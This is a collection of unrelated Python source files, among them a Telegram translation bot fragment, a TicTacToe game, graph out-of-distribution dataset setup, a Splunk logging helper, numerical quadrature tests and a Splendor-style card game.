f'[{chat_type}, @{message.from_user.id}, #{message.from_user.first_name}] {message.text} '
)
result = translate_text(message.text)
await message.reply(result, disable_notification=True)
elif ((chat_type == 'group') or
(chat_type == 'supergroup')) and (str(chat_id) in GROUP_LIST):
cprint(f"{chat_id} 自动翻译 {message.text}", 'white', 'on_cyan')
capture_message(
f'[{chat_type}, @{message.from_user.id}, #{message.from_user.first_name}] {message.text} '
)
await bot.send_chat_action(message.chat.id, action="typing")
result = output(trans_auto(message.text))
await message.reply( result, parse_mode='markdown', disable_notification=True,
disable_web_page_preview=True, reply_markup=action_btn)
else: # 过滤所有群聊、频道
# print(str(message.chat.id) in GROUP_LIST)
pass
@dp.message_handler()
async def text_others(message: types.Message):
print('Other types')
capture_message('Other types')
try:
# clog(message)
capture_message(message)
await bot.send_chat_action(message.chat.id, action="typing")
result = translate_text(message.text)
except Exception as e:
print('Exception', e)
capture_message('Exception', e)
result = '? ? ?'
await message.answer(result)
# 行内查询
@dp.inline_handler()
async def inline(inline_query: InlineQuery):
text = inline_query.query or '输入以翻译 Input to Translate...'
user = inline_query.from_user.username
user_id = inline_query.from_user.id
end_str = ''
if len(text) >= 256:
end_str = '\n\n(达到长度限制,请私聊翻译全文)'
if text == '输入以翻译 Input to Translate...':
pass
else:
cprint(f'[inline, @{user}, #{user_id}] {text} ', 'white', 'on_cyan')
capture_message(f'[inline, @{user}, #{user_id}] {text} ')
zh_str = translate_text(text, 'zh')
en_str = translate_text(text, 'en')
jp_str = translate_text(text, 'ja')
pt_str = translate_text(text, 'pt')
items = [
InlineQueryResultArticle(
id=0,
title=f'{en_str}'.strip(),
description='🇺🇸 English',
thumb_width=0,
input_message_content=InputTextMessageContent(
f'{en_str}{end_str}', disable_web_page_preview=True),
),
InlineQueryResultArticle(
id=1,
title=f'{zh_str}'.strip(),
description='🇨🇳 中文',
thumb_width=0,
input_message_content=InputTextMessageContent(
f'{zh_str}{end_str}', disable_web_page_preview=True),
),
InlineQueryResultArticle(
id=2,
title=f'{jp_str}'.strip(),
description='🇯🇵 にほんご',
thumb_width=0,
input_message_content=InputTextMessageContent(
f'{jp_str}{end_str}', disable_web_page_preview=True),
),
InlineQueryResultArticle(
id=3,
title=f'{pt_str}'.strip(),
description='🇵🇹 Português',
thumb_width=0,
input_message_content=InputTextMessageContent(
f'{pt_str}{end_str}', disable_web_page_preview=True),
)
]
await bot.answer_inline_query(inline_query.id,
results=items,
cache_time=300)
if __name__ == '__main__':
cprint('I\'m working now...', 'white', 'on_green')
# capture_message('I\'m working now...')
executor.start_polling(dp, skip_updates=True)
| StarcoderdataPython |
5038288 | <reponame>LeLuxNet/GridPy
from lib import app, led
class App(app.GridGame):
def __init__(self):
super().__init__("TicTacToe", 3, 3, 3)
self.board = self.calc_board()
def _render(self, cords):
x = (cords.x - self.board[2]) // self.board[1]
y = (cords.y - self.board[4]) // self.board[0]
if x < 0 or x >= self.width or y < 0 or y >= self.height:
return self.turn.light_color
elif self.game[x][y] is not None:
return self.game[x][y].color
elif self.sel_col == x and (self.sel_row == -1 or self.sel_row == y):
return led.COLOR_WHITE
return led.COLOR_BLACK
def drop(self):
self.game[self.sel_col][self.sel_row] = self.turn
| StarcoderdataPython |
3509999 | <reponame>linlin-yu/Graph-Posterior-Network
from gpn.data import DatasetManager, get_ood_split_evasion
from gpn.data import InMemoryDatasetProvider, OODInMemoryDatasetProvider
from gpn.data import OODIsolatedInMemoryDatasetProvider
from gpn.utils import DataConfiguration
def set_num_left_out(data_cfg: DataConfiguration):
"""utility function setting the number-of-left-out classes for LOC experiments for each dataset accordingly
Args:
data_cfg (DataConfiguration): original data configuration
Raises:
ValueError: raised if unsupported dataset found
"""
if data_cfg.dataset in ('Cora', 'CoraML',"Cora01","Cora02","Cora03"):
data_cfg.set_values(ood_num_left_out_classes=3)
elif data_cfg.dataset == 'CoraFull':
data_cfg.set_values(ood_num_left_out_classes=30)
elif data_cfg.dataset in ('CiteSeer',"CiteSeer01","CiteSeer02","CiteSeer03"):
data_cfg.set_values(ood_num_left_out_classes=3)
elif 'PubMed' in data_cfg.dataset:
data_cfg.set_values(ood_num_left_out_classes=1)
elif 'AmazonPhotos'in data_cfg.dataset:
data_cfg.set_values(ood_num_left_out_classes=3)
elif 'AmazonComputers'in data_cfg.dataset:
data_cfg.set_values(ood_num_left_out_classes=5)
elif data_cfg.dataset == 'ogbn-arxiv':
data_cfg.set_values(ood_num_left_out_classes=15)
elif 'CoauthorPhysics'in data_cfg.dataset:
data_cfg.set_values(ood_num_left_out_classes=2)
elif 'CoauthorCS'in data_cfg.dataset:
data_cfg.set_values(ood_num_left_out_classes=4)
elif data_cfg.dataset == 'SynCora':
data_cfg.set_values(ood_num_left_out_classes=2)
elif data_cfg.dataset == 'SynProducts':
data_cfg.set_values(ood_num_left_out_classes=3)
else:
raise ValueError(f'Dataset {data_cfg.dataset} not supported!')
class ExperimentDataset:
"""wrapper for dataset to be used in an experiment
Sets up the dataset as specified for all different kinds of experiments, e.g. OOD experiments.
"""
def __init__(self, data_cfg: DataConfiguration, to_sparse: bool = False):
self.data_cfg = data_cfg
for _ in range(data_cfg.split_no):
dataset = DatasetManager(**data_cfg.to_dict())
default_dataset = InMemoryDatasetProvider(dataset)
self.dim_features = default_dataset.num_features
self.num_classes = default_dataset.num_classes
self.train_dataset = default_dataset
self.train_val_dataset = default_dataset
self.val_dataset = default_dataset
self.ood_dataset = None
self.to_sparse = to_sparse
self.splits = ('train', 'test', 'val', 'all')
if data_cfg.ood_flag:
if data_cfg.ood_setting == 'evasion':
self._setup_evasion()
elif data_cfg.ood_setting == 'poisoning':
self.splits = ('train', 'test', 'val')
self._setup_poisoning()
else:
raise ValueError
else:
if to_sparse:
self.train_dataset.to_sparse()
# finally reset number of classes
self.num_classes = self.train_dataset.num_classes
# if nothing further specified: warmup/finetuning on training dataset
self.warmup_dataset = self.train_dataset
self.finetune_dataset = self.train_dataset
self.train_loader = None
self.train_val_loader = None
self.val_loader = None
self.ood_loader = None
self.warmup_loader = None
self.finetune_loader = None
self.setup_loader()
def setup_loader(self):
self.train_loader = self.train_dataset.loader()
self.train_val_loader = self.train_val_dataset.loader()
self.val_loader = self.val_dataset.loader()
if self.ood_dataset is not None:
self.ood_loader = self.ood_dataset.loader()
else:
self.ood_loader = None
if self.warmup_dataset is not None:
self.warmup_loader = self.warmup_dataset.loader()
else:
self.warmup_loader = None
if self.finetune_dataset is not None:
self.finetune_loader = self.finetune_dataset.loader()
else:
self.finetune_loader = None
def _setup_evasion(self):
# in evasion setting, also allow perturbations
# of the set of training nodes
# budget: val_dataset and ood_dataset are the same
# isolated: val dataset is not perturbed, ood set is perturbed
if self.data_cfg.ood_dataset_type == 'budget':
self.ood_dataset = OODInMemoryDatasetProvider(self.val_dataset)
self.ood_dataset.perturb_dataset(**{**self.data_cfg.to_dict(), 'perturb_train_indices': True})
self.val_dataset = self.ood_dataset
if self.to_sparse:
self.ood_dataset.to_sparse()
elif self.data_cfg.ood_dataset_type == 'isolated':
self.ood_dataset = OODIsolatedInMemoryDatasetProvider(
self.val_dataset, self.data_cfg.ood_type, **self.data_cfg.to_dict())
if self.to_sparse:
self.val_dataset.to_sparse()
else:
raise ValueError
def _setup_poisoning(self):
# train dataest is perturbed (new train_loader)
# val_loader and ood_loader are based on perturbed val_dataset
if self.data_cfg.ood_type == 'leave_out_classes':
set_num_left_out(self.data_cfg)
self.train_dataset = OODInMemoryDatasetProvider(self.train_dataset)
self.train_dataset.perturb_dataset(**{**self.data_cfg.to_dict(), 'perturb_train_indices': True})
if self.to_sparse:
self.train_dataset.to_sparse()
self.train_val_dataset = self.train_dataset
self.ood_dataset = self.train_dataset
self.val_dataset = self.train_dataset
elif self.data_cfg.ood_type == 'leave_out_classes_evasion':
assert len(self.train_dataset) == 1
set_num_left_out(self.data_cfg)
id_data, ood_data, num_classes = get_ood_split_evasion(
self.train_dataset[0],
num_classes=self.train_dataset.num_classes,
perturb_train_indices=True,
**self.data_cfg.to_dict()
)
self.train_dataset.data_list = [id_data]
self.train_dataset.set_num_classes(num_classes)
self.train_val_dataset = self.train_dataset
if self.to_sparse:
self.train_dataset.to_sparse()
self.val_dataset = self.train_dataset.clone(shallow=True)
self.val_dataset.data_list = [ood_data]
self.val_dataset.set_num_classes(num_classes)
self.ood_dataset = self.val_dataset
if self.to_sparse:
self.val_dataset.to_sparse()
elif self.data_cfg.ood_dataset_type == 'budget':
self.train_dataset = OODInMemoryDatasetProvider(self.train_dataset)
self.train_dataset.perturb_dataset(**{**self.data_cfg.to_dict(), 'perturb_train_indices': False})
self.train_val_dataset = self.train_dataset
self.ood_dataset = self.train_val_dataset
self.val_dataset = self.train_val_dataset
if self.to_sparse:
self.train_dataset.to_sparse()
else:
raise ValueError
| StarcoderdataPython |
8085651 | <reponame>ehealthz-lab/microservice-chatbot-python-template
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import configparser
from objects import tokens
import requests
configfile = "config.conf" # Configuration file
class deregistration():
def __init__(self):
self.config = {}
# Client Configuration from file config.cfg
cfg = configparser.ConfigParser()
if not cfg.read(configfile, "utf8"): #if not cfg.read(["config.cfg"]):
print ("File does not exist")
if cfg.has_option("net_dispatcher", "client_id"): #client_id
self.config['CLIENT_ID'] = cfg.get("net_dispatcher", "client_id")
else:
print ("Config file need to have client_id field")
if cfg.has_option("net_dispatcher", "file_cert_dispatcher"): #file_cert_dispatcher
self.config['RUTA_CERT'] = cfg.get("net_dispatcher", "file_cert_dispatcher")
else:
print ("Config file need to have file_cert_dispatcher field")
if cfg.has_option("net_dispatcher", "delete_functionality"): #delete_functionality
self.config['DELETE_FUNCTIONALITY'] = (cfg.get("net_dispatcher", "delete_functionality"))
else:
print ("Config file need to have delete_functionality field")
def deregister(self):
# It checks expiration time of the token
tokens.server_token().exp_token()
# It obtains the token
token = tokens.server_token().get_tokenDB()
# It deletes the funcionality in the database
data = requests.delete(self.config['DELETE_FUNCTIONALITY'] + "?client_id=" + self.config['CLIENT_ID'],
headers={'Authorization': 'Bearer ' + token['Data']['id_token']},
verify=self.config['RUTA_CERT'])
print(data.content)
| StarcoderdataPython |
9644966 | <filename>tests/test_quadrature.py
import unittest
import numpy as np
from empirical.quadrature import *
def function(x):
return x * np.sin(30 * x) + np.cos(5 * x)
def function_integral(x):
return (-(1 / 30) * x * np.cos(30 * x) +
(1 / 5) * np.sin(5 * x) +
(1 / 900) * np.sin(30 * x))
integration_value = function_integral(1) - function_integral(-1)
class QuadratureTest(unittest.TestCase):
def test_linear(self):
N = 250
x, w = linear(N)
self.assertEqual(x.shape, (N,))
self.assertEqual(w.shape, (N,))
self.assertEqual(x[0], -1)
self.assertEqual(x[-1], 1)
integrate = np.sum(x * w)
self.assertAlmostEqual(integrate, 0, places=10)
# no use testing sinusoid integration, it'll be widely off
def test_pt(self):
N = 250
x, w = periodic_trapezoid(N)
self.assertEqual(x.shape, (N,))
self.assertEqual(w.shape, (N,))
self.assertNotIn(-1, x)
self.assertNotIn(1, x)
integrate = np.sum(x * w)
self.assertAlmostEqual(integrate, 0, places=10)
integrate = np.sum(function(x) * w)
self.assertAlmostEqual(integrate, integration_value, places=4)
def test_t(self):
N = 251
x, w = trapezoid(N)
self.assertEqual(x.shape, (N,))
self.assertEqual(w.shape, (N,))
self.assertEqual(x[0], -1)
self.assertEqual(x[-1], 1)
integrate = np.sum(x * w)
self.assertAlmostEqual(integrate, 0, places=10)
integrate = np.sum(function(x) * w)
self.assertAlmostEqual(integrate, integration_value, places=2)
def test_lgl(self):
N = 250
x, w = legendre_gauss_lobatto(N)
self.assertEqual(x.shape, (N,))
self.assertEqual(w.shape, (N,))
integrate = np.sum(x * w)
self.assertAlmostEqual(integrate, 0, places=10)
integrate = np.sum(function(x) * w)
self.assertAlmostEqual(integrate, integration_value, places=10) | StarcoderdataPython |
1627221 | # exports the skin gcode for each layer into their own skin layer files
import PRNTR
import shutil
path1 = PRNTR.location
bottom_range1 = PRNTR.bottom_range
bottom_range2 = int('{}'.format(bottom_range1))
print(bottom_range2)
top_range1 = PRNTR.top_range
top_range2 = int('{}'.format(top_range1))
print(top_range2)
def copi():
for x in range(bottom_range2,top_range1):
number = int
number = x
number = int(number)
image_name = 'Layer{}'.format(number)
print('Layer{}'.format(number))
def copy():
src = '{}/files/Layer/{}.gcode'.format(path1, image_name)
dst = '{}/files/Layer/skin/{}.gcode'.format(path1, image_name)
shutil.copyfile(src, dst) #Copys the file into the folder and renames it
copy()
def skin():
for x in range(bottom_range2,top_range2):
number = int
number2 = int
number = x #remeber to have number 1 larger than layer looking for because the layers of g-code start at 0
number = int(number)
number2 = 0
Layernumber = number - number2
print("")
print('Layer number:', Layernumber)
converted_Layernumber = str(Layernumber)
string_in_string = "Layer{}.gcode".format(converted_Layernumber)
print(string_in_string)
def erase(): #erases top
"""
This function will delete all line from the givin start_key
until the stop_key. (include: start_key) (exclude: stop_key)
"""
start_key = '; Layer:'
stop_key = ";TYPE:SKIN"
try:
# read the file lines
with open('{}/files/Layer/skin/{}'.format(path1, string_in_string), 'r+') as fr:
lines = fr.readlines()
# write the file lines except the start_key until the stop_key
with open('{}/files/Layer/skin/{}'.format(path1, string_in_string), 'w+') as fw:
# delete variable to control deletion
delete = True
# iterate over the file lines
for line in lines:
# check if the line is a start_key
# set delete to True (start deleting)
if line.strip('\n') == start_key:
delete = True
# check if the line is a stop_key
# set delete to False (stop deleting)
elif line.strip('\n') == stop_key:
delete = False
# write the line back based on delete value
# if the delete setten to True this will
# not be executed (the line will be skipped)
if not delete:
fw.write(line)
except RuntimeError as ex:
print(f"erase error:\n\t{ex}")
def erase2(): #erases bottom
"""
This function will delete all line from the givin start_key
until the stop_key. (include: start_key) (exclude: stop_key)
"""
start_key2 = ';MESH:NONMESH'
stop_key2 = ";TIME_ELAPSED:"
try:
# read the file lines
with open('{}/files/Layer/skin/{}'.format(path1,string_in_string), 'r+') as fr:
lines = fr.readlines()
# write the file lines except the start_key until the stop_key
with open('{}/files/Layer/skin/{}'.format(path1, string_in_string), 'w+') as fw:
# delete variable to control deletion
delete = False
# iterate over the file lines
for line in lines:
# check if the line is a start_key
# set delete to True (start deleting)
if line.strip('\n') == start_key2:
delete = True
# check if the line is a stop_key
# set delete to False (stop deleting)
elif line.strip('\n') == stop_key2:
delete = False
# write the line back based on delete value
# if the delete setten to True this will
# not be executed (the line will be skipped)
if not delete:
fw.write(line)
except RuntimeError as ex:
print(f"erase error:\n\t{ex}")
erase()
erase2()
if __name__ == '__main__':
copi()
skin()
| StarcoderdataPython |
4867819 | from splunk_http_event_collector import http_event_collector
def getHecConn(token, host, event_type, event_host, port, secure):
hec = http_event_collector(
token,
host,
event_type,
event_host,
port,
secure)
hec_reachable = hec.check_connectivity()
if not hec_reachable:
return None
return hec
# Create a payload to send to splunk
# Assign all common parameters and add data specific events later
def initSplunkPayload(
index="main",
host="localhost",
source="raspberry",
sourcetype="_json"):
payload = {}
payload.update({"index": index})
payload.update({"sourcetype": sourcetype})
payload.update({"source": source})
payload.update({"host": host})
return payload
| StarcoderdataPython |
8015776 | <filename>benchmark.py
from pampy import match, _
from pattern_matching import *
def test_pampy(data):
for datum in data:
match(datum,
[_, str, _], lambda a, b, c: "%s(%s)%s"%(a, b, c),
(str, int), lambda a, b: a * b,
(int, int), lambda a, b: "%d%d"%(a, b))
class MatchError(Exception):
pass
class TypeMatcher:
def __init__(self, t):
def match(x, i):
if i is not 1 or not isinstance(x, t):
raise MatchError
return (x, )
self.__match__ = match
Str = TypeMatcher(str)
Int = TypeMatcher(int)
@syntax_rule(pattern_matching)
def test_mm(data):
for d in data:
with match(d):
if case[[a, Str(b), c]]:
"%s(%s)%s"%(a, b, c)
if case[(Str(s), Int(i))]:
s * i
if case[(Int(i1), Int(i2))]:
"%d%d"%(i1, i2)
data = [("xx", 3), ("yyy", 2), (1, 2), (5, 6), (1000, 2000)]
test_pampy(data)
test_mm(data)
# %timeit test_mm(data)
# 9.83 µs ± 85.9 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each)
# %timeit test_pampy(data)
# 52.8 µs ± 797 ns per loop (mean ± std. dev. of 7 runs, 10000 loops each) | StarcoderdataPython |
1832311 | import re
import ast
from contextlib import suppress
from random import randint
from typing import Union, List, Tuple, Optional
class GameError(Exception):
pass
class Card:
COLOR_CODES = ['r', 'd', 'o', 'e', 's', 'x']
COLOR_SHORT_NAMES = ["ruby ", "diamd", "onyx ", "emrld", "saphi", "artcr"]
COLOR_IDS = {
key: [value, cid] for key, value, cid in zip(COLOR_CODES, COLOR_SHORT_NAMES, range(len(COLOR_CODES)))
}
def __init__(self, format_list: list = None, gem: int = None, level: int = None,
value: int = None, cost: list = None, printing_rules='e'):
if format_list and len(format_list) == 9:
if not isinstance(format_list[0], str):
raise ValueError("improper color code type in first format argument")
if len(format_list[0]) != 1:
raise ValueError("code has exactly one character")
if any([(not isinstance(i, int)) for i in format_list[1:]]):
raise ValueError("improper type of format list argument; should be int")
self.gem = format_list[0]
self.value = format_list[2]
self.level = format_list[3]
self.cost = tuple(format_list[4:])
else:
if any([gem is None, level is None, value is None, cost is None]):
if len(format_list) != 9:
raise ValueError("format list has to be exactly 9 elements long")
raise ValueError("Values can't be empty unless you provide formating list with 9 elements")
if gem not in self.COLOR_CODES:
raise ValueError(f"{gem} isn't valid color code")
if any([not isinstance(level, int), not isinstance(value, int)]):
raise ValueError("card value and level has to be of type int")
if len(cost) != 5:
raise ValueError("cost variable has to have exactly 5 values")
if any([(not isinstance(val, int)) for val in cost]):
raise ValueError("values in cost has to be of type int")
self.gem = gem
self.value = value
self.level = level
self.cost = tuple(cost)
self.printing_rules = printing_rules
def __str__(self):
# simplifying case
if not self.printing_rules:
return str([self.gem, self.level, self.value, self.cost])
p = f' {self.value if self.value > 0 else " "} '
rank = ' R' + ''.join(['I' if i <= self.level - 1 else ' ' for i in range(3)]) + ' '
gem = self.COLOR_SHORT_NAMES[self.color_id]
return ''.join([
f"╔═════════════════╗\n",
f"║ {gem} {p} ║\n",
f"║ + {rank} ║\n",
f"║ /_\ ║\n",
f"║ :<_>: %s rub ║\n" % (f' {self.cost[0]}',),
f"║ /=====\ %s dia ║\n" % (f' {self.cost[1]}',),
f"║ :_[I]_: %s onx ║\n" % (f' {self.cost[2]}',),
f"║::::::::: %s emd ║\n" % (f' {self.cost[3]}',),
f"║ %s sap ║\n" % (f' {self.cost[4]}',),
f"╚═════════════════╝"])
def __eq__(self, other):
if isinstance(other, self.__class__):
if other is not self:
return [self.gem, self.level, self.value, self.cost] == \
[other.gem, other.level, other.value, other.cost]
else:
return True
elif isinstance(other, Player):
raise NotImplementedError(f"comparison between {other.__class__} and {self.__class__} not implemented")
elif other is None:
return False
raise TypeError(f"comparing {self.__class__} to {other.__class__} has no meaning in this context")
@property
def color_id(self):
return self.COLOR_IDS[self.gem][1]
def can_be_bought(self, other):
"""
for simplicity, invoking counterpart method from 'Player' class
"""
if isinstance(other, Player):
return other.can_buy(self)
raise ValueError(f"can't compare object {other.__class__} to Card meaningfully")
def print_short(self):
p_r = self.printing_rules
self.printing_rules = None
s = str(self)
self.printing_rules = p_r
return s
class Player:
def __init__(self, p_id: int):
if not isinstance(p_id, int):
raise ValueError(f'id of the player should be of class int, not {p_id.__class__}')
self.id = p_id
self.tokens = [0] * 6
self.cards = []
self.reserved = (None, None, None,)
@staticmethod
def provide_position() -> Tuple[int, int]:
chosen = False
while not chosen:
try:
row = input("choose row of cards")
card = input("choose card in given row")
r = int(row)
c = int(card)
chosen = True
return r, c
except ValueError:
print("couldn't convert inputs into integer numbers, "
"try again and make sure you typed correct data")
@property
def buying_power(self):
# this avoids deepcopy
power = [_ for _ in self.tokens]
for card in self.cards:
power[card.color_id] += 1
return power
@property
def card_power(self):
power = [0] * 5
for card in self.cards:
if card.color_id != 5:
power[card.color_id] += 1
return power
def check_selection(self, open_cards: List[List[Card]], deck_sizes: List[int], desired_card: tuple):
if not (desired_card[0] in [0, 1, 2]) or not(desired_card[1] in [0, 1, 2, 3, 4, 5]):
raise GameError("selection doesn't match any of the available positions")
if desired_card[1] < 4:
if open_cards[desired_card[0]][desired_card[1]] is None:
raise GameError("there is no card at given position")
if desired_card[1] == 4:
# check tops of the given row's deck
if desired_card[0] == 0:
if deck_sizes[0] == 0:
raise GameError("no card in the L1 deck")
if desired_card[0] == 1:
if deck_sizes[1] == 0:
raise GameError("no card in the L2 deck")
if desired_card[0] == 2:
if deck_sizes[2] == 0:
raise GameError("no card in the L3 deck")
if desired_card[1] == 5:
# check 'slot' in self.reserved
try:
if self.reserved[desired_card[0]] is None:
raise GameError("no card to choose in this position")
except IndexError:
raise GameError("you haven't yet reserved a card")
def can_buy(self, other: Card) -> Tuple[bool, int]:
"""
this is used to calculate if a player can afford to buy a specific card most of the time
first we calculate if player has enough combined regular tokens + card equivalents
then if he has not enough, 'wild-card' tokens come to calculation, and only if this is not enough
it returns false
:param other: Card that one wish to buy
:return: True if greater or equal, or not if there's not enough resources, and the nr of wildcards
"""
# guard statements
if not isinstance(other, Card):
if isinstance(other, Player):
raise NotImplementedError("comparison between players isn't implemented yet")
raise ValueError(f"can't compare object {other.__class__} to Player meaningfully")
if other.level == 0:
raise GameError("can't buy aristocrat card! Aristocrats can only be invited")
# compute the difference of the player 'buy-power' against card cost,
# leave values only for tokens that matter
cids = Card.COLOR_IDS
difference = [
self.buying_power[cids[c_code][1]] - other.cost[cids[c_code][1]]
for c_code in Card.COLOR_CODES[:5]
]
lacking = -sum([0 if d >= 0 else d for d in difference])
if lacking > self.tokens[5]:
return False, lacking
return True, lacking
def get_token(self, color: int):
self.tokens[color] += 1
def pay_tokens(self, debt: Tuple[bool, int], card: Card) -> List[int]:
if card.level == 0:
raise GameError("aristocrat Card should not appear here")
to_pay = [
min(tokens, max(cost - cs, 0)) if cost > 0 else 0
for tokens, cs, cost in zip(self.tokens, self.card_power, card.cost)
] + [debt[1]]
self.tokens = [tokens - pay_amount for tokens, pay_amount in zip(self.tokens, to_pay)]
return to_pay
def pay_token(self, color: int):
if self.tokens[color] == 0:
raise GameError("can't pay more, we have 0 tokens")
self.tokens[color] -= 1
def buy_card(self, card: Card):
if (cmp := self.can_buy(card))[0]:
self.cards.append(card)
paid = self.pay_tokens(cmp, card)
return True, paid
return False, [0] * 6
def buy_reserve(self, desired_card: int):
try:
if (cmp := self.can_buy(card := self.reserved[desired_card]))[0]:
self.cards.append(self.reserved[desired_card])
r = [c for index, c in enumerate(self.reserved) if index != desired_card] + [None]
self.reserved = tuple(r)
paid = self.pay_tokens(cmp, card)
return True, paid
except ValueError as ve:
if self.reserved[desired_card] is None:
raise GameError("No card in this reserve slot! Choose another card")
else:
raise ValueError(str(ve))
return False, [0] * 6
def reserve(self, card: Card):
if card.level == 0:
raise GameError("aristocrats can't be reserved")
if None in self.reserved:
r = [card] + list(self.reserved[:2])
self.reserved = tuple(r)
else:
raise GameError("Can't reserve more than 3 cards, buy the reserved card out to free space")
def select_card(self, open_cards: List[List[Card]], deck_sizes: List[int]) -> Tuple[int, int]:
desired_card = self.provide_position()
# function call serving as guard statement
self.check_selection(open_cards, deck_sizes, desired_card)
return desired_card
def can_invite(self, card: Card):
if isinstance(card, Card):
if card.level == 0:
diff = [cp - cost for cp, cost in zip(self.card_power, card.cost)]
fulfilled_requirements = [True if d >= 0 else False for d in diff]
if all(fulfilled_requirements):
return True
return False
raise GameError("this is not aristocrat card!")
elif card is None:
return False
raise TypeError("unsupported for types other than Card")
def invite(self, card: Card):
if self.can_invite(card):
print("can invite")
print("inviting:\n", card)
self.cards.append(card)
return card
class Game:
def __init__(self, player_count: int):
if not (1 < player_count < 5):
raise GameError("cant start game with improper number of players")
self.player_count = player_count
self.l1_deck: List[Card] = []
self.l2_deck: List[Card] = []
self.l3_deck: List[Card] = []
self.nobles: List[Card] = []
self.players: List[Player] = []
self.tokens: List[int] = []
self.open_cards: List[List[Optional[Card]]] = []
@staticmethod
def load_cards(file: str = "cards.txt"):
all_cards = []
with open(file, "r") as card_db:
for line in card_db:
if not re.match(r"#", line):
card_entry = ast.literal_eval(line)
all_cards.append(card_entry)
return all_cards
@staticmethod
def dek_tiers(_cards):
return [_cards[:40], _cards[40:70], _cards[70:90], _cards[90:]]
@staticmethod
def shuffle_dek(_dek):
_d = _dek
for i in range(len(_d) * 7):
j = randint(0, len(_d) - 1)
k = randint(0, len(_d) - 1)
if k != j:
_d[j], _d[k] = _d[k], _d[j]
return _d
@staticmethod
def shuffle(_decks):
return [Game.shuffle_dek(_d) for _d in _decks]
@property
def deck_sizes(self):
return [len(self.l1_deck), len(self.l2_deck), len(self.l3_deck)]
def setup_tokens(self):
if self.player_count > 2:
if self.player_count == 4:
self.tokens = [7] * 5 + [5]
return
self.tokens = [5] * 5 + [5]
return
self.tokens = [4] * 5 + [5]
def setup_cards(self):
kards = Game.dek_tiers(Game.load_cards())
self.l1_deck = [Card(c) for c in kards[0]]
self.l2_deck = [Card(c) for c in kards[1]]
self.l3_deck = [Card(c) for c in kards[2]]
self.nobles = [Card(c) for c in kards[3]]
self.open_cards = [
[self.l1_deck.pop() for _ in range(4)],
[self.l2_deck.pop() for _ in range(4)],
[self.l3_deck.pop() for _ in range(4)],
[self.nobles.pop() for _ in range(self.player_count + 1)],
]
def setup_players(self):
self.players = [Player(p_id=i) for i in range(self.player_count)]
def full_setup(self):
self.setup_tokens()
self.setup_cards()
self.setup_players()
def give_token(self, color: int, p_id: int):
if not 0 <= color <= 5:
raise GameError('color does not exist')
if self.tokens[color] > 0:
self.tokens[color] -= 1
self.players[p_id].get_token(color)
return
raise GameError("can't give tokens of a color when there's none")
def take_token(self, color: int, p_id: int):
if not 0 <= color <= 5:
raise GameError('color does not exist')
if self.players[p_id].tokens[color] > 0:
self.tokens[color] += 1
self.players[p_id].pay_token(color)
return
raise GameError("can't take tokens when player has none")
def replace_empty(self):
for deck, row in enumerate(self.open_cards):
for index, slot in enumerate(row):
if not slot:
with suppress(IndexError):
# it is ok for multiple/one of the decks to run out,
# in 4-player game l1 runs out quite often
if deck == 0:
self.open_cards[deck][index] = self.l1_deck.pop()
elif deck == 1:
self.open_cards[deck][index] = self.l2_deck.pop()
elif deck == 2:
self.open_cards[deck][index] = self.l3_deck.pop()
def player_draw_3(self, colors: Union[list, tuple], p_id: int):
if 0 < len(colors) < 4:
for color in colors:
self.give_token(color, p_id=p_id)
return
raise GameError("too many or too little colors chosen")
def player_draw_2_same(self, color: int, p_id: int):
if self.tokens[color] > 2:
self.give_token(color, p_id)
self.give_token(color, p_id)
return
raise GameError("given color isn't available to be chosen in that option")
def player_select(self, p_id: int):
self.players[p_id]: Player
desired_card = self.players[p_id].select_card(self.open_cards, self.deck_sizes)
# the necessary check were already performed in 'Player' by this point
if desired_card[1] == 4:
# reserve-only - selecting top of the corresponding deck
# since i am using pop to push new cards onto open field, the last element of the
# card list in a deck is considered it's top
if desired_card[0] == 0:
card = self.l1_deck[-1]
if desired_card[0] == 1:
card = self.l2_deck[-1]
if desired_card[0] == 2:
card = self.l3_deck[-1]
elif desired_card[1] == 5:
# buying from reserved cards only
card = self.players[p_id].reserved[desired_card[0]]
else:
card = self.open_cards[desired_card[0]][desired_card[1]]
return card, desired_card
def player_buys(self, card: Card, desired_card: tuple, p_id: int):
# traditional buy
if desired_card[1] in [0, 1, 2, 3]:
bought, paid = self.players[p_id].buy_card(card)
if bought:
self.open_cards[desired_card[0]][desired_card[1]] = None
elif desired_card[1] == 4:
raise GameError("can't buy card from the top of the library directly!")
# buy from reserve
elif desired_card[1] == 5:
bought, paid = self.players[p_id].buy_reserve(desired_card[0])
try:
for color, tokens in enumerate(paid):
self.tokens[color] += tokens
except UnboundLocalError:
raise GameError("something went wrong with buying card")
def player_reserve(self, card: Card, desired_card: tuple, p_id: int):
if desired_card[1] == 4:
self.players[p_id].reserve(card)
if desired_card[0] == 0:
c = self.l1_deck.pop()
if desired_card[0] == 1:
c = self.l2_deck.pop()
if desired_card[0] == 2:
c = self.l3_deck.pop()
else:
self.players[p_id].reserve(card)
self.open_cards[desired_card[0]][desired_card[1]] = None
c = card
self.give_token(Card.COLOR_IDS['x'][1], p_id)
return c
def player_aristocrat_inviting(self, p_id):
a_id = -1
for index, aristocrat in enumerate(self.open_cards[3]):
card = self.players[p_id].invite(aristocrat)
if card:
a_id = index
break
if a_id != -1:
self.open_cards[3][a_id] = None
return card
if __name__ == '__main__':
cards = Game.load_cards()
# pprint(cards)
# print(cards[3], len(cards))
for dek_t in (decks := Game.dek_tiers(cards)):
# pprint(dek_t)
print(len(dek_t))
decks = Game.shuffle(decks)
# pprint(decks)
print(cards[0])
new_card = Card(format_list=cards[0])
print(new_card)
new_card.print_short()
print(cards[57])
new_card2 = Card(format_list=cards[57])
print(new_card2)
new_card2.print_short()
player1 = Player(0)
player1.tokens[1] = 2
player1.tokens[0] = 1
player1.tokens[3] = 3
player1.cards = [new_card, new_card2]
print(player1.card_power)
print(player1.card_power)
print(player1.buying_power)
print(player1.buying_power)
print(player1.buying_power)
print(player1.card_power)
print(player1.cards)
| StarcoderdataPython |
3512809 | #!/usr/bin/env python
"""
Main objects of the systems: Part and Assembly
"""
# Standard library modules.
import operator
import functools
# Third party modules.
# Local modules.
from fsaecostreport.pattern import SYS_ASSY_PN, SUB_ASSY_PN, PART_PN
# Globals and constants variables.
@functools.total_ordering
class _Component(object):
"""
Abstract class for parts and assemblies.
"""
def __init__(self, filepath, system_label, name, pn_base, revision, details=""):
"""
Creates a component.
:arg system_label: label of the system in which the component is in
:arg name: full name
:arg pn_base: part number base (e.g. 00001 in BR-00001-AA)
:arg revision: two characters revision
:arg details: further details/description
**Attributes**:
* :attr:`name`: full name
